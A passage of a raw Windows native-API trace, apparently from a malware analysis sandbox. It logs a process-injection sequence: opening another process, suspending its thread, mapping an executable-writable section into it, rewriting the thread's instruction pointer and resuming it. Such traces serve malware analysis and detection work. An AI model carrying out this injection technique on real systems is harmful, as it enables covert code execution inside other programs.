BaseAddress=0x19e6f8*=0x3160000, SectionOffset=0x0, ViewSize=0x19e6b0*=0x1a7000) returned 0x0 [0158.653] NtMapViewOfSection (in: SectionHandle=0x108, ProcessHandle=0x104, BaseAddress=0x19e6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6ec*=0x1a6200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f4*=0xa80000, SectionOffset=0x0, ViewSize=0x19e6ec*=0x1a7000) returned 0x0 [0158.686] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x3160000) returned 0x0 [0158.698] NtClose (Handle=0x108) returned 0x0 [0158.698] NtSetContextThread (ThreadHandle=0x100, Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x1df970, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x1df918, Eip=0xb93707, SegCs=0x23, EFlags=0x246, Esp=0x1df8fc, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0158.698] NtResumeThread (in: ThreadHandle=0x100, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0158.698] NtClose (Handle=0x104) returned 0x0 [0158.698] NtClose (Handle=0x100) returned 0x0 [0158.699] NtOpenProcess (in: ProcessHandle=0x19ea74, DesiredAccess=0x438, ObjectAttributes=0x19ea3c*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea54*(UniqueProcess=0xbd4, UniqueThread=0x0) | out: ProcessHandle=0x19ea74*=0x100) returned 0x0 [0158.699] NtQueryInformationProcess (in: ProcessHandle=0x100, ProcessInformationClass=0x1a, ProcessInformation=0x19ea64, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19ea64, ReturnLength=0x0) returned 0x0 [0158.699] NtQueryInformationProcess (in: ProcessHandle=0x100, ProcessInformationClass=0x0, ProcessInformation=0x19e6e8, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x19e6e8, ReturnLength=0x0) returned 0x0 [0158.699] NtReadVirtualMemory (in: ProcessHandle=0x100, BaseAddress=0x7efde000, Buffer=0x19e9fc, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0x19e9fc*, NumberOfBytesRead=0x0) returned 0x0 [0158.700] NtDelayExecution (Alertable=0, Interval=0x19e6d0*=-50000000) returned 0x0 [0158.707] NtOpenThread (in: ThreadHandle=0x19ea68, DesiredAccess=0x1a, ObjectAttributes=0x19e6b4, ClientId=0x19e6cc*(UniqueProcess=0x0, UniqueThread=0xbd8) | out: ThreadHandle=0x19ea68*=0x104) returned 0x0 [0158.707] NtSuspendThread (in: ThreadHandle=0x104, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0158.708] NtMapViewOfSection (in: SectionHandle=0xec, ProcessHandle=0x100, BaseAddress=0x19e708*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19e708*=0x1ff0000, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000) returned 0x0 [0158.713] NtGetContextThread (in: ThreadHandle=0x104, Context=0x19e730 | out: Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x40fbb8, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x40fb60, Eip=0x766e78d7, SegCs=0x23, EFlags=0x246, Esp=0x40fb44, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0158.729] NtCreateSection (in: SectionHandle=0x19e6f0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e6b0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e6f0*=0x108) returned 0x0 [0158.729] NtMapViewOfSection (in: SectionHandle=0x108, ProcessHandle=0xffffffff, BaseAddress=0x19e6f8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6b0*=0x139200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f8*=0x3160000, SectionOffset=0x0, ViewSize=0x19e6b0*=0x13a000) returned 0x0 [0158.736] NtMapViewOfSection (in: SectionHandle=0x108, ProcessHandle=0x100, BaseAddress=0x19e6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6ec*=0x139200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f4*=0x9d0000, SectionOffset=0x0, ViewSize=0x19e6ec*=0x13a000) returned 0x0 [0158.757] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x3160000) returned 0x0 [0158.768] NtClose (Handle=0x108) returned 0x0 [0158.769] NtSetContextThread (ThreadHandle=0x104, Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x40fbb8, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x40fb60, Eip=0xa76707, SegCs=0x23, EFlags=0x246, Esp=0x40fb44, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, 